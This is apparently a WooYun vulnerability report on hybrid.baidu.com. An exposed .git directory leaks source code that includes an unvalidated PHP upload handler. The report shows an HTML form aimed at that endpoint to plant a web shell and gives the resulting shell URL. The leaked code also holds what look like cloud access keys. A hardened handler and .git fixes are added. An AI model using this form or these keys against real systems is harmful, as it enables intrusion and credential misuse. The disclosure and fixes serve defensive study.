WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online reader -------- http://drop.zone.ci/
2015-05-15: Details reported to the vendor, awaiting vendor response
2015-05-19: Vendor confirmed; details disclosed to the vendor only
2015-05-29: Details disclosed to core white hats and relevant domain experts
2015-06-08: Details disclosed to regular white hats
2015-06-18: Details disclosed to intern white hats
2015-07-03: Details disclosed to the public
A killer tool in hand, the world is mine!
http://hybrid.baidu.com/.git/config is web-accessible: a git information disclosure. With the .git directory exposed, the repository can be pulled down and the site source recovered;
➜ hybrid.baidu.com git:(master) ✗ ls -lh
total 0
drwxr-xr-x 22 tank staff 748B 5 15 12:46 general
drwxr-xr-x 20 tank staff 680B 5 15 13:09 wenku
Inside there is an upload.php. Let's take a look: the file extension is taken straight from the client-supplied filename and never checked against a whitelist, and the script echoes back the server path it wrote to, so uploading a .php file gives a web shell at a known location.
<?php
/**
 * Upload
 */
error_reporting(0);
session_start();
$allow_sep = "1"; // minimum interval between uploads, in seconds; stops repeated uploads from refreshing this file in quick succession
if (isset($_SESSION['post_sep'])) {
    if (time() - $_SESSION['post_sep'] < $allow_sep) {
        exit('wait 1 second');
    } else {
        $_SESSION['post_sep'] = time();
    }
} else {
    $_SESSION['post_sep'] = time();
}
date_default_timezone_set('Asia/Shanghai');
if ($_SERVER['REQUEST_URI']) {
    $temp = urldecode($_SERVER['REQUEST_URI']);
    if (strpos($temp, '<') !== false || strpos($temp, '>') !== false || strpos($temp, '(') !== false || strpos($temp, '"') !== false) {
        exit('Request Bad url');
    }
}
if ($_FILES['Filedata']['size'] != 0) {
    if (isset($_FILES['Filedata']) && is_array($_FILES['Filedata'])) {
        $attach = $_FILES['Filedata'];
    }
    $max_upload_size = 10485760; // in bytes (never enforced: the size check below is inside the commented-out block)
    $old_attachName = mb_detect_encoding($attach['name']) == 'UTF-8' ? $attach['name'] : iconv('gbk', "utf-8", $attach['name']);
    // Extension is whatever follows the last '.' in the client filename; no whitelist, so 'php' is accepted
    $attach['ext'] = explode('.', $attach['name']);
    if (($length = count($attach['ext'])) > 1) {
        $ext = strtolower($attach['ext'][$length - 1]);
    }
    $year = date("Y");
    $month = date("m");
    $day = date("d");
    $fnamehash = md5(uniqid(microtime())); // fnamehash is the MD5 of the current time, used to rename the attachment
    $new_dir_name = $year . '-' . $month . '-' . $day . '-' . $fnamehash;
    $object = '/www' . '.' . $ext;
    if (!file_exists(dirname(__FILE__) . '/temp/' . $new_dir_name)) {
        mkdir(dirname(__FILE__) . '/temp/' . $new_dir_name, 0777);
    }
    $path = $attach['tmp_name'];
    $opt = array("filename" => $old_attachName, "acl" => "public-read");
    // File is written under the web root as temp/<date>-<hash>/www.<ext>
    move_uploaded_file($path, dirname(__FILE__) . "/temp/" . $new_dir_name . $object);
    //echo "http://10.42.82.59/zhaojie/temp".$object;
    // The full server path (including the random directory name) is returned to the uploader
    echo dirname(__FILE__) . "/temp/" . $new_dir_name . $object;
    return;
    //require_once('./bcs/bcs.class.php');
    /*
    $host = 'bcs-sandbox.baidu.com'; //offline
    $ak = 'J78GkSfzDt1VmNlvy2Erg5uErXofKbTXZa9';
    $sk = '6xvpoHR2tCpkHXGBHLtfzPqRq0oGamyWa';
    $bucket = 'auto-pack-bucket-nanjing';
    $baidu_bcs = new BaiduBCS ( $ak, $sk, $host );
    if ($attach['size'] > $max_upload_size) {
        //@unlink($attach['tmp_name']);
        echo 'max limited';
    }
    $response = $baidu_bcs->create_object ( $bucket, $object, $path ,$opt); // upload the attachment
    if (! $response->isOK ()) die ( "upload object failed." );
    $opt = array ();
    $opt ["time"] = time () + 3600; // optional: link valid for one hour from now (unix timestamp)
    */
    echo $baidu_bcs->generate_get_object_url ( $bucket, $object, $opt );
}
?>
getshell
<html>
<body>
<form action="http://hybrid.baidu.com/wenku/upload.php" method="post" enctype="multipart/form-data">
<label for="file">Filename:</label>
<input type="file" name="Filedata" id="file" /> <br />
<input type="submit" name="submit" value="Submit" />
</form>
</body>
</html>
http://hybrid.baidu.com/wenku/temp/2015-05-15-e876c4f4056327c58fa22e467e8e5d7f/www.php
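For contrast, here is a hardened replacement for the upload handler above. This is an added example written for this page, not Baidu's code and not part of the original report. It assumes the endpoint only ever needs to accept documents and images (the whitelist and the /wenku/temp/ URL prefix are assumptions), and it closes the three gaps the vulnerable script has: the extension is checked against a whitelist instead of being copied from the client filename, the file's real content type is checked with finfo rather than trusting $_FILES['type'], and the response returns only a URL path instead of the server's filesystem path. The rate-limiting session logic from the original is left out for brevity.

```php
<?php
/**
 * Hardened upload handler (added example; assumes uploads are documents/images only
 * and that the web server does not execute anything under /temp as PHP).
 */
error_reporting(0);
session_start();
date_default_timezone_set('Asia/Shanghai');

// Whitelist of accepted extensions and the MIME type each must actually have.
// .php, .phtml, .phar, .htaccess etc. are rejected simply by not being listed.
$allowed = array(
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'pdf'  => 'application/pdf',
    'zip'  => 'application/zip',
);
$max_upload_size = 10485760; // 10 MiB, enforced this time

function fail($msg) {
    http_response_code(400);
    exit($msg);
}

if (!isset($_FILES['Filedata']) || !is_array($_FILES['Filedata'])) {
    fail('no file');
}
$attach = $_FILES['Filedata'];

// Reject transport errors and anything that is not a genuine PHP upload temp file.
if ($attach['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($attach['tmp_name'])) {
    fail('upload error');
}
if ($attach['size'] <= 0 || $attach['size'] > $max_upload_size) {
    fail('max limited');
}

// Extension from the client name, lower-cased, but only accepted if whitelisted.
$ext = strtolower(pathinfo($attach['name'], PATHINFO_EXTENSION));
if (!isset($allowed[$ext])) {
    fail('file type not allowed');
}

// Sniff the real content type; $_FILES['type'] is client-controlled and must not be trusted.
$finfo = new finfo(FILEINFO_MIME_TYPE);
$mime = $finfo->file($attach['tmp_name']);
if ($mime !== $allowed[$ext]) {
    fail('content does not match extension');
}

// Server-generated random directory name; the client filename never reaches the disk.
$new_dir_name = date('Y-m-d') . '-' . bin2hex(random_bytes(16));
$base = dirname(__FILE__) . '/temp/';
if (!is_dir($base . $new_dir_name) && !mkdir($base . $new_dir_name, 0750, true)) {
    fail('cannot create dir');
}
$dest = $base . $new_dir_name . '/www.' . $ext;
if (!move_uploaded_file($attach['tmp_name'], $dest)) {
    fail('move failed');
}
chmod($dest, 0640); // not world-writable, unlike the 0777 directory in the original

// Return only the public URL path (assumed prefix), never dirname(__FILE__).
echo '/wenku/temp/' . $new_dir_name . '/www.' . $ext;
```

The whitelist on its own is the fix for this report's getshell; the MIME check and the permission changes are defence in depth. The git disclosure is a separate web-server misconfiguration and needs its own fix: deny access to the .git directory at the server (for nginx a `location ~ /\.git { deny all; }` block, for Apache `RedirectMatch 404 /\.git`), or better, do not deploy the working tree with its .git directory at all.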
git
Severity: High
Vulnerability rank: 20
Confirmed: 2015-05-19 13:43
Thanks
None